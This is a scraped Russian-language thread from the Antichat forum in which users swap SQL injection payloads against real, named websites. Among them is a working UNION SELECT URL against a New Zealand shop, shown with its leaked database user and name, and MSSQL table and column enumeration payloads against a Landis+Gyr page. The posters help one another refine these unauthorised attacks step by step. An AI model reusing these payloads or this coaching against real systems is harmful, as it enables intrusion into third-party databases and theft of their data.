Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.01.2009, 04:13
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545
Репутация:
242
|
|
Сообщение от betakley
доброй ночи, есть вопрос, возможно глупый, но для меня важный.
если я войду на определенный сайт под своим аккаунтом, а затем запущу скрипт на веб-сервере своего компьютера (в том же браузере), который задаст значение переменной и проинклудит скрипт с того сайта, чтобы он увидел эту переменную как глобальную, то будет ли при этом инклуде доступна моя текущая сессия?
если SSID в куках - да.
|
|
|
17.01.2009, 04:28
|
|
Новичок
Регистрация: 29.12.2008
Сообщений: 24
Провел на форуме:
228928
Репутация:
20
|
|
спасибо за ответ, PHPSESSID в соответствующем куке есть, значит должно сработать  |
|
|
|
17.01.2009, 09:48
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Ваше не паленая такая ошибка)) а дальше что?
http://www.landisgyr.eu/en/pub/about/news.cfm?news_ID=-1350')+union+select+@@version--
|
|
|
|
17.01.2009, 09:52
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Ребята, подскажите, как дальше, че-то не соображу:
http://www.naturalbodycare-nz.com/shop/list.php?ca_id=123'
Последний раз редактировалось Octave_Parango; 17.01.2009 в 09:55..
|
|
|
|
17.01.2009, 10:26
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776
Репутация:
93
|
|
Octave_Parango, четвертая ветка, union почему-то не съедает.
|
|
|
|
17.01.2009, 12:15
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
Сообщение от Octave_Parango
Ребята, подскажите, как дальше, че-то не соображу:
PHP код:
http://www.naturalbodycare-nz.com/shop/list.php?ca_id=123)+UniOn+SelEct+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
standard:bodynz_admin@localhost:bodynz_shop
|
|
|
|
17.01.2009, 13:58
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Сообщение от sabe
Ваше не паленая такая ошибка)) а дальше что?
а чем проблемма то? ))
http://www.landisgyr.eu/en/pub/about/news.cfm?news_ID=-1350')+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES)--
|
|
|
|
17.01.2009, 18:49
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Кто знает,в чём причина ?
(select+system_user)-- - Выводит страницу,но в гайде было сказано про
system_user(),а не system_user,но вот 1+and+1=system_user-- (Без скобок) работает.Может,я и делал неправильно,но так работает.CHAR(),к сожалению,тоже не работает.
(select+syssdlfkf_user) - Пишет ошибку
Значит,system_user существует.
LIMIT не работает,но можно через нот ин:
(select+column_name from information_schema.columns+where+table_name+not+in +(0x7573657273)-- не катит.Как потом выяснилось,с hex() тоже.
(select+column_name+from+information_schema.column s+where+table_name+not+in+(char(117)+char(115)+cha r(101)+char(114)+char(115)))
Тоже не катит.Через ТОР тоже.
db_name() работает,но не в форме (select+db_name()),а как условие:
1+and+1=db_name()
Выяснил,что всего там 12 баз данных.Сразу вспомнился гайд по эксплуатации MsSql inj здесь,на форуме.Теперь вопросы:
1)В information_schema.tables содержатся таблицы от всех 12-и баз ?На одном сервере эти таблицы или могут быть на нескольких серверах ?
2)Каков правильный синтаксис процедур в MsSql ?
3)Как выбрать поле из определённой таблицы через ТОР,как это было в случае таблиц ?
ЗЫ: Мучал сервер Microsoft SQL Server 2005 на винде со вторым сервис паком.Судя по ошибке - одноядерный )В качестве системного юзера стоит 'sa',так что на процедуры забивать пока не собираюсь )))
|
|
|
|
17.01.2009, 19:11
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Ппц.. я не знаю, что за "гайд" ты там читал... Но...
Код:
(select+column_name from information_schema.columns+where+table_name+not+in +(0x7573657273)--
Ты понимаешь, что это за запрос?
Перевожу:
Выбрать имя колонки из information_schema, где имя таблицы не 0x7573657273.
Если хочешь выводить колонки из таблиц:
Код:
(select+top+1+column_name+from+information_schema.columns+where+table_name='таблица'+and+COLU MN_NAME+not+in+('колонка','колонка2'))--
Вот гайд, читай.
http://forum.antichat.ru/thread30501.html
Последний раз редактировалось R1dex; 17.01.2009 в 19:21..
|
|
|
|
17.01.2009, 19:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
more 1 row, mssql не поддерживает limit либо top либо between
1 на одном
2 create procedure() begin ... end, select procedure()
3 top 1 column_name from information_schema.columns where table_name='x'
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
